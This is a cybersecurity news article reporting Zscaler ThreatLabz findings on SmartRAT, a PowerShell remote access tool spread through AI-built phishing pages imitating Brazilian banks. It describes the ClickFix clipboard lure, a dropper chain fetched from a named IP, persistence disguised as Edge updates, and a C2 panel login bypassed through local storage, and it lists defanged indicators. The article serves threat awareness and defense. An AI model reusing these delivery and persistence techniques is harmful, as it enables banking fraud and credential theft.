A new cyberattack campaign has emerged, using cleverly crafted phishing pages and PowerShell tricks to deliver a dangerous piece of malware called SmartRAT.
The attack targets Brazilian banking customers and combines social engineering with AI-generated web pages to make the threat feel disturbingly real.
Researchers say the campaign marks a troubling shift in how attackers build and deploy their tools.
The attackers set up a fake website mimicking a well-known Brazilian bank, complete with a convincing credit card application page and a fake security verification prompt.
Once a visitor interacts with the page, they are pressured into running a malicious PowerShell command, which quietly downloads and installs SmartRAT. The malware can record keystrokes, capture screenshots, intercept QR codes, and display full-screen fake bank forms to steal credentials.
Analysts from Zscaler ThreatLabz, who first spotted this campaign in March 2026, said in a report shared with Cyber Security News (CSN) that the fraudulent page was likely built using an AI-powered website creation tool.
Researchers found telltale signs of AI-generated code in the page source, including templated section comments and automated structuring that are common outputs from these tools.
What makes this campaign especially dangerous is how it layers multiple deception techniques on top of one another.
The phishing page first shows a fake Cloudflare CAPTCHA, then triggers a fake Blue Screen of Death to panic victims into following instructions.
This technique, known as ClickFix, convinces victims their system has crashed and that running a specific command is the only way to recover.
.webp)
SmartRAT itself is a fully featured remote access tool written entirely in PowerShell, with a deep reach into any system it infects. It monitors browser windows for banking activity and alerts its operator the moment a victim opens a financial app or website.
The attacker can then take over the screen, inject keystrokes, block victim input, and steal whatever data is entered.
Hackers Abuse PowerShell Commands
The infection begins when a victim pastes a PowerShell command into the Windows Run dialog, unaware it was silently planted in their clipboard by the malicious page.
That command connects to a remote server at 64.95.13.238 and pulls down a file called st.txt, which acts as a hidden dropper.
The dropper fetches a second file, payload.php, containing an AES-encrypted PowerShell script that unpacks and executes SmartRAT.
SmartRAT hides itself by disguising its files and scheduled tasks under Microsoft Edge update names, blending in with legitimate Windows processes.
.webp)
It attempts to escalate privileges by prompting for UAC approval, and if granted, installs itself as a Windows service under SYSTEM-level access.
Even if the user denies that request, SmartRAT persists through a hidden PowerShell process and a registry-based startup entry.
AI-Built Infrastructure and a Critically Flawed C2 Panel
One striking discovery is that the attackers also used AI tools to build their command-and-control panel, a web interface used to manage infected machines.
Researchers found the panel’s login system was entirely client-side, meaning anyone could bypass it by simply setting two values in the browser’s local storage.
This basic security gap points to code written without proper review, a likely result of rushed, AI-assisted development.
The C2 panel, branded as MyGood PRO, gives operators a live dashboard of connected victims along with real-time command capabilities.
.webp)
Operators can stream a victim’s screen, swap QR codes on banking pages to redirect payment transactions, and inject fake bank verification forms to harvest passwords.
The platform targets more than a dozen Brazilian banks and payment services, showing this is a targeted and well-resourced operation.
To stay protected, users should be cautious of any website asking them to paste commands into their computer, even when the page looks like a legitimate bank or security prompt.
Organizations should monitor for unusual PowerShell execution, unexpected scheduled tasks, and outbound connections to unknown IP addresses. Endpoint protection tools that flag script-based threats remain a critical line of defense against attacks like SmartRAT.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| Domain | crefisa[.]online | Fraudulent phishing domain |
| Domain | vfsgloball[.]net | Fraudulent phishing domain |
| Domain | cartaobb[.]com | Fraudulent domain impersonating Brazilian bank |
| Domain | windowsupdate-cdn[.]com | SmartRAT C2 domain |
| IP Address | 64[.]95[.]13[.]238 | C2 IP address used for payload delivery |
| IP Address | 162[.]141[.]111[.]227 | Fallback C2 IP address |
| MD5 Hash | 297eb45f028d44d750297d2f932b9c91 | st.txt (PowerShell dropper) |
| MD5 Hash | 6bf4d4c62b5138ace281ce3d08297787 | payload.php (encrypted loader) |
| MD5 Hash | 3c72e1f37f115b00c3ad6ed31bacfe8a | PowerShell RAT (SmartRAT) |
| MD5 Hash | b17ccdb5531555e43f082d6e77c07227 | PowerShell RAT (SmartRAT variant) |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
